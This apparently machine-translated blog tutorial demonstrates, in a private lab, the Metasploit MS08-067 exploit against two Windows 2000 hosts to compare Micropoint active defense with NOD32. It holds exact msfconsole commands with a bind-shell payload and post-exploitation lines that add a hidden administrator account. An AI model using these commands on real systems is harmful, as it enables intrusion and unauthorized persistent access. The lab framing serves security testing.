Implementation and defense of overflow (vulnerability) Attacks

Preface

System vulnerabilities have been constantly raised in the media. Some of my friends and users know that it is important to install system patches, however, I always think that the danger on the network is far away from myself. Most people think that it is very difficult to launch a remote attack and even think that as long as anti-virus software is installed, it is all right. Is that true? Let's take a look at today's operations.

After the launch of the active defense technology through microservices, the current security industry has been injected with a stimulant. Now, major manufacturers have publicized their own active defense technologies, and the publicity on the Internet is also mixed. Everything is based on facts.

650) this. width = 650; "onclick = 'window. open (" http://blog.51cto.com/viewpic.php? Refimg = "+ this. src) 'width = "1130" height = "526" border = "0" title = "16" style = "border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px; "alt =" 16 "src =" http://www.bkjia.com/uploads/allimg/131227/0Z0143642-0.jpg "/>

 Test Environment

Metasploit

Operating System: CentOS5

Software Version: framework-3.5.0-linux-i686.run

IP Address: 192.168.0.10

650) this. width = 650; "onclick = 'window. open (" http://blog.51cto.com/viewpic.php? Refimg = "+ this. src) 'width = "781" height = "586" border = "0" title = "03" style = "border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px; "alt =" 03 "src =" http://www.bkjia.com/uploads/allimg/131227/0Z014Ea-1.jpg "/>

Metasploithttp: // www.metasploit.com/framework/download/) is an open-source security vulnerability detection tool. Since Metasploit is a free tool, security staff often use Metasploit tools to detect system security. Metasploit Framework (MSF) is a development Framework released in the open source code form in 2003 that is freely available. This environment provides a reliable platform for penetration testing, shellcode writing, and vulnerability research. It integrates common overflow vulnerabilities and popular shellcode on various platforms and is constantly updated. The latest version of MSF includes exploit for more than 180 popular operating systems and application software, and more than 100 shellcodes. As a security tool, it plays an important role in security detection and provides powerful protection for automatic Vulnerability Detection and timely detection of system vulnerabilities.

Micro-point active defense Software

Operating System: Windows 2000 SP2

Verbose version:

IP Address: 192.168.0.200

650) this. width = 650; "onclick = 'window. open (" http://blog.51cto.com/viewpic.php? Refimg = "+ this. src) 'width = "781" height = "585" border = "0" title = "00" style = "border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px; "alt =" 00 "src =" http://www.bkjia.com/uploads/allimg/131227/0Z0144O5-2.jpg "/>

650) this. width = 650; "onclick = 'window. open (" http://blog.51cto.com/viewpic.php? Refimg = "+ this. src) 'width = "782" height = "586" border = "0" title = "02" style = "border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px; "alt =" 02 "src =" http://www.bkjia.com/uploads/allimg/131227/0Z01461B-3.jpg "/>

NOD32 Environment

Operating System: Windows 2000 SP2

Software Version:

IP Address: 192.168.0.100

650) this. width = 650; "onclick = 'window. open (" http://blog.51cto.com/viewpic.php? Refimg = "+ this. src) 'width = "780" height = "587" border = "0" title = "09" style = "border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px; "alt =" 09 "src =" http://www.bkjia.com/uploads/allimg/131227/0Z0141264-4.jpg "/>

650) this. width = 650; "onclick = 'window. open (" http://blog.51cto.com/viewpic.php? Refimg = "+ this. src) 'width = "776" height = "585" border = "0" title = "10" style = "border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px; "alt =" 10 "src =" http://www.bkjia.com/uploads/allimg/131227/0Z0144522-5.jpg "/>

Procedure

Build a test environment

Follow the instructions in the introduction to build the corresponding test environment to ensure that the three machines can communicate with each other. For the construction method of the experiment environment, refer to the article about building a test network using a single host and communicating with physical machines. There are many ways to install metaspoodle on the network, and the method is not complex.

View local users

Open "user management" on the computer where the micro-point active defense software is installed to view all local users.

650) this. width = 650; "onclick = 'window. open (" http://blog.51cto.com/viewpic.php? Refimg = "+ this. src) 'width = "779" height = "583" border = "0" title = "01" style = "border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px; "alt =" 01 "src =" http://www.bkjia.com/uploads/allimg/131227/0Z0143529-6.jpg "/>

Overflow attacks against vertices

Log on to the system where Metasploit is installed, run the following command to start the Metasploit program, set the overflow vulnerability of the call to MS08-067, the remote host to 192.168.0.200, and the local connection port to 5555, as shown in.

 
 

  
  
msfconsole  
  
  
use exploit/windows/smb/ms08_067_netapi  
  
  
set PAYLOAD windows/shell/bind_tcp  
  
  
set RHOST 192.168.0.200  
  
  
set LPORT 5555  
  
  
exploit 
 
 

650) this. width = 650; "onclick = 'window. open (" http://blog.51cto.com/viewpic.php? Refimg = "+ this. src) 'width = "781" height = "586" border = "0" title = "04" style = "border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px; "alt =" 04 "src =" http://www.bkjia.com/uploads/allimg/131227/0Z0144D8-7.jpg "/>

650) this. width = 650; "onclick = 'window. open (" http://blog.51cto.com/viewpic.php? Refimg = "+ this. src) 'width = "781" height = "587" border = "0" title = "05" style = "border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px; "alt =" 05 "src =" http://www.bkjia.com/uploads/allimg/131227/0Z0144452-8.jpg "/>

650) this. width = 650; "onclick = 'window. open (" http://blog.51cto.com/viewpic.php? Refimg = "+ this. src) 'width = "783" height = "585" border = "0" title = "06" style = "border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px; "alt =" 06 "src =" http://www.bkjia.com/uploads/allimg/131227/0Z0141T7-9.jpg "/>

View Attack results)

After the preceding command is entered, the local Metasploit will prompt that the overflow ends but the session permission is not obtained. At this time, the micropoint has detected an overflow attack and the IP address of the remote attacker is also provided, it proves that the installation of the micro-point active defense software can effectively prevent overflow attacks. As shown in.

650) this. width = 650; "onclick = 'window. open (" http://blog.51cto.com/viewpic.php? Refimg = "+ this. src) 'width = "780" height = "587" border = "0" title = "07" style = "border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px; "alt =" 07 "src =" http://www.bkjia.com/uploads/allimg/131227/0Z01464N-10.jpg "/>

650) this. width = 650; "onclick = 'window. open (" http://blog.51cto.com/viewpic.php? Refimg = "+ this. src) 'width = "781" height = "585" border = "0" title = "08" style = "border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px; "alt =" 08 "src =" http://www.bkjia.com/uploads/allimg/131227/0Z01414P-11.jpg "/>

Overflow Attack on NOD32

Log on to Metasploit and reset the host address of the remote attack. Because a specific overflow vulnerability has been specified, you only need to reset the remote host address. The specific instructions are as follows.

 
 

  
  
unset RHOST  
  
  
set RHOST 192.168.0.100  
  
  
show options  
  
  
exploit 
 
 

650) this. width = 650; "onclick = 'window. open (" http://blog.51cto.com/viewpic.php? Refimg = "+ this. src) 'width = "781" height = "588" border = "0" title = "11" style = "border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px; "alt =" 11 "src =" http://www.bkjia.com/uploads/allimg/131227/0Z014N00-12.jpg "/>

View Attack result NOD32)

After you enter the preceding commands, the system prompts that you have obtained the management permissions of the remote host. In this case, enter the commands in the remote management session to add users to the computer and grant them the administrator permissions, the specific instructions are as follows.

 
 

  
  
net user test 123 /add  
  
  
net localgroup administrators test /add 
 
 

650) this. width = 650; "onclick = 'window. open (" http://blog.51cto.com/viewpic.php? Refimg = "+ this. src) 'width = "778" height = "586" border = "0" title = "12" style = "border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px; "alt =" 12 "src =" http://www.bkjia.com/uploads/allimg/131227/0Z014OF-13.jpg "/>

650) this. width = 650; "onclick = 'window. open (" http://blog.51cto.com/viewpic.php? Refimg = "+ this. src) 'width = "780" height = "588" border = "0" title = "13" style = "border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px; "alt =" 13 "src =" http://www.bkjia.com/uploads/allimg/131227/0Z0143196-14.jpg "/>

Test Remote Users

To detect the effect of an overflow attack, a test user is added when you open the "user management" interface. You can also use this user to log on to the system and have administrator privileges, as shown in.

650) this. width = 650; "onclick = 'window. open (" http://blog.51cto.com/viewpic.php? Refimg = "+ this. src) 'width = "781" height = "588" border = "0" title = "14" style = "border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px; "alt =" 14 "src =" http://www.bkjia.com/uploads/allimg/131227/0Z0145V0-15.jpg "/>

650) this. width = 650; "onclick = 'window. open (" http://blog.51cto.com/viewpic.php? Refimg = "+ this. src) 'width = "780" height = "585" border = "0" title = "15" style = "border-left-width: 0px; border-bottom-width: 0px; border-right-width: 0px; "alt =" 15 "src =" http://www.bkjia.com/uploads/allimg/131227/0Z0141J1-16.jpg "/>

Postscript

From the test above, we can know that the attack promoted by micro-points to prevent overflow is indeed effective. The following describes the function.

"The invention relates to a computer buffer overflow attack detection method, that is, by establishing a hook function to check the return address of the stack frame established by the thread, determine whether a buffer overflow occurs based on the returned address. After a buffer overflow is detected, the thread that causes the buffer overflow ends. The buffer overflow attack detection method provided in this invention can not only efficiently and accurately detect buffer overflow attacks of malicious programs, it also avoids the lag of anti-virus software in existing technologies in acquiring new virus feature codes, as well as the tedious use of firewall systems and the troubles caused by users with little computer knowledge. Even new viruses and Trojans with buffer overflow attacks can be intercepted accurately and efficiently ."

"Patent Application) No.: 200510007681.5"

If you don't like reading text, you can watch the video seek.

Statement

The purpose of this article is not to provide support for those who have bad motives, nor to take joint and joint responsibilities arising from abuse of technology; this article aims to arouse everyone's awareness of network security to the maximum extent, face up to the crisis facing our online world, and take action.

This article is from the "virtual reality" blog. For more information, contact the author!